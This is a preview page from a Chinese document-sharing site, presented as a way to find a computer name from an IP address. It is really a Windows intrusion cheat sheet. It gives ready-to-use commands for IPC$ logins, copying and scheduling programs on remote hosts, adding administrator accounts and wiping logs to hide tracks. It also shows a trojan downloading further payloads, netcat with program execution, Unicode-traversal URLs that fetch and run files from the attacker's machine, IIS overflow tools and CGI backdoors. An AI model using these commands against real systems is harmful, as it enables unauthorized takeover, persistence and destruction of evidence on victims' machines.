通過IP查詢計算機名_第1頁
通過IP查詢計算機名_第2頁
通過IP查詢計算機名_第3頁
通過IP查詢計算機名_第4頁
通過IP查詢計算機名_第5頁
全文預覽已結束

付費下載

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

常用的幾條NET命令:1.知道對方ip查看對方的計算機名方法:開始->運行->cmd->netview對方ip或者開始->運行->cmd->nbtstat-a對方ip2.知道對方計算機名查看對方ip方法:開始->運行->cmd->ping對方計算機名或者開始->運行->cmd->nbtstat-a對方計算機名(與遠程主機建立空管連接)netuse\\IP地址\ipc$""/use:""(以管理員身份登錄遠程主機)netuse\\IP地址\ipc$"密碼"/use:"Administrator"(傳送文件到遠程主機WINNT目錄下)copy本機目錄路徑\程序\\IP地址\admin$(查看遠程主機時間)nettime\\IP地址(定時啟動某個程序)at\\IP地址02:18readme.exe(查看共享)netview\\IP地址(查看netbios工作組列表)nbtstat-AIP地址(將遠程主機C盤映射為自己的F盤)netusef:\\IP地址\c$""/user:"Administrator"(這兩條把自己增加到管理員組):netuser用戶名密碼/addnetlocalgroupAdministrators用戶名/add(斷開連接)netuse\\IP地址\ipc$/delete擦屁屁:delC:\winnt\system32\logfiles\*.*delC:\winnt\system32\config\*.evtdelC:\winnt\system32\dtclog\*.*delC:\winnt\system32\*.logdelC:\winnt\system32\*.txtdelC:\winnt\*.txtdelC:\winnt\*.log============================一、netsvc.exe下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:netsvc/list\\IP地址netsvcschedule\\IP地址/querynetsvc\\IP地址schedule/start二、OpenTelnet.exe遠程啟動主機的Telnet服務,并綁定端口到7878,例如:OpenTelnet\\IP地址用戶名密碼17878然后就可以telnet到主機的7878端口,進入DOS方式下:telnetIP地址7878三、winshell.exe一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>后,可打下面的命令:pPath(查看winshell主程序的路徑信息)breBoot(重新啟動機器)dshutDown(關閉機器)sShell(執行后你就會看到可愛的“C:\>”)xeXit(退出本次登錄會話,此命令并不終止winshell的運行)CMD>http://.../srv.exe(通過http下載其他網站上的文件到運行winshell的機器上)四、3389登陸器,GUI方式登錄遠程主機的五、elsave.exe事件日志清除工具elsave-s\\IP地址-l"application"-Celsave-s\\IP地址-l"system"-Celsave-s\\IP地址-l"security"-C執行后成功清除應用程序日志,系統日志,安全日志六、hbulot.exe開啟win2kserver和winxp的3389服務hbulot[/r]使用/r表示安裝完成后自動重起目標使設置生效。七、nc.exe(netcat.exe)一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。想要連接到某處:nc[-options]hostnameport[s][ports]...綁定端口等待連接:nc-l-pport[-options][hostname][port]參數:-eprog程序重定向,一旦連接,就執行[危險!!]-ggatewaysource-routinghoppoint[s],upto8-Gnumsource-routingpointer:4,8,12,...-h幫助信息-isecs延時的間隔-l監聽模式,用于入站連接-n指定數字的IP地址,不能用hostname-ofile記錄16進制的傳輸-pport本地端口號-r任意指定本地及遠程端口-saddr本地源地址-uUDP模式-v詳細輸出——用兩個-v可得到更詳細的內容-wsecstimeout的時間-z將輸入輸出關掉——用于掃描時八、TFTPD32.EXE把自己的電腦臨時變為一臺FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/ctftp-i本機IP地址get文件名c:\winnt\system32\文件名然后可以直接令文件運行:http://IP地址/scripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名九、prihack.exe是IIS的printer遠程緩沖區溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然后用IE瀏覽器連接。一、一Xscan命令行運行參數說明:在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據后提前退出程序,按""強行關閉程序。1.命令格式:xscan-host[-][其他選項]xscan-file[其他選項]其中含義如下:-port:檢測常用服務的端口狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定制待檢測端口列表);-ftp:檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);-ntpass:檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件);-cgi:檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案);-iis:

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論